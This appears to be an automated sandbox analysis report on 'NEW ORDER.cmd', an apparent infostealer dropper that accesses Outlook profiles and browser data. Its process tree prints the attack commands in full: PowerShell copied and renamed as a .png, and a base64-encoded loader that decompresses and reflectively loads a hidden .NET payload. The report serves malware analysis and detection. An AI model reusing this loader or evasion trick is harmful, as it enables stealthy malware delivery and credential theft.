Analysis
-
max time kernel
142s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2023 20:46
Static task
static1
Behavioral task
behavioral1
Sample
NEW ORDER.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEW ORDER.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
NEW ORDER.cmd
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
NEW ORDER.cmd
Resource
win10v2004-20230915-en
General
-
Target
NEW ORDER.cmd
-
Size
1.7MB
-
MD5
546a223f6646e33809e9b2ef29df5c46
-
SHA1
a754082ee814e7dc4d33e16f68972e4cd969f4a2
-
SHA256
473a0251276e0b7260698c7a9cc879c935dc35f138b5243faa5721830dd79299
-
SHA512
d75b0a2a5bddb1d8be2091987f57df4c8b3e381761cd9701adbcc561a51b2be7ce165f55788a54e5c21b2c3e041db265965f72211be1e65ec4a6863592391749
-
SSDEEP
24576:NNn9wdn6DtyQBpICuGreBd8qohFj3DlF5mVoUBAKDHlhuQYTEddFqwuaA/BliTUM:T2td0esLhF5GHlwQN6wJWKExlq
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 4584 Ysrph.png -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook Ysrph.png Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook Ysrph.png Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4584 Ysrph.png 4584 Ysrph.png 4584 Ysrph.png 4584 Ysrph.png 4584 Ysrph.png 4584 Ysrph.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4584 Ysrph.png Token: SeDebugPrivilege 4584 Ysrph.png -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1724 wrote to memory of 3364 1724 cmd.exe 86 PID 1724 wrote to memory of 3364 1724 cmd.exe 86 PID 3364 wrote to memory of 5096 3364 cmd.exe 88 PID 3364 wrote to memory of 5096 3364 cmd.exe 88 PID 3364 wrote to memory of 3344 3364 cmd.exe 89 PID 3364 wrote to memory of 3344 3364 cmd.exe 89 PID 3364 wrote to memory of 2624 3364 cmd.exe 90 PID 3364 wrote to memory of 2624 3364 cmd.exe 90 PID 3364 wrote to memory of 5088 3364 cmd.exe 91 PID 3364 wrote to memory of 5088 3364 cmd.exe 91 PID 3364 wrote to memory of 4584 3364 cmd.exe 92 PID 3364 wrote to memory of 4584 3364 cmd.exe 92 -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ysrph.png
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:5096
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ysrph.png3⤵PID:3344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2624
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd" C:\Users\Admin\AppData\Local\Temp\Ysrph.png.bat3⤵PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\Ysrph.pngC:\Users\Admin\AppData\Local\Temp\Ysrph.png -win 1 -enc JABVAGMAbwBmAHoAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQARQBlAGMAaQBoAGgAaAB2AGQAaQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAGMAbwBmAHoAKQA7ACQAVwBmAGQAdwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABFAGUAYwBpAGgAaABoAHYAZABpACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAEIAaAB0AHYAegBtAHEAdAB1AGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABXAGYAZAB3AHkALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEIAaAB0AHYAegBtAHEAdAB1AGkAZAAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAQgBoAHQAdgB6AG0AcQB0AHUAaQBkAC4AQwBsAG8AcwBlACgAKQA7ACQAVwBmAGQAdwB5AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQARQBlAGMAaQBoAGgAaAB2AGQAaQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABFAGUAYwBpAGgAaABoAHYAZABpACkAOwAgACQAVAB5AHYAcABxAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABFAGUAYwBpAGgAaABoAHYAZABpACkAOwAgACQAUgBjAGMAegBtAHUAaAB5AGQAdQAgAD0AIAAkAFQAeQB2AHAAcQBsAHMALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABQAGgAbgBwAGQAaQBjACAAPQAgACQAUgBjAGMAegBtAHUAaAB5AGQAdQAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4584
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
1.7MB
MD5546a223f6646e33809e9b2ef29df5c46
SHA1a754082ee814e7dc4d33e16f68972e4cd969f4a2
SHA256473a0251276e0b7260698c7a9cc879c935dc35f138b5243faa5721830dd79299
SHA512d75b0a2a5bddb1d8be2091987f57df4c8b3e381761cd9701adbcc561a51b2be7ce165f55788a54e5c21b2c3e041db265965f72211be1e65ec4a6863592391749
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82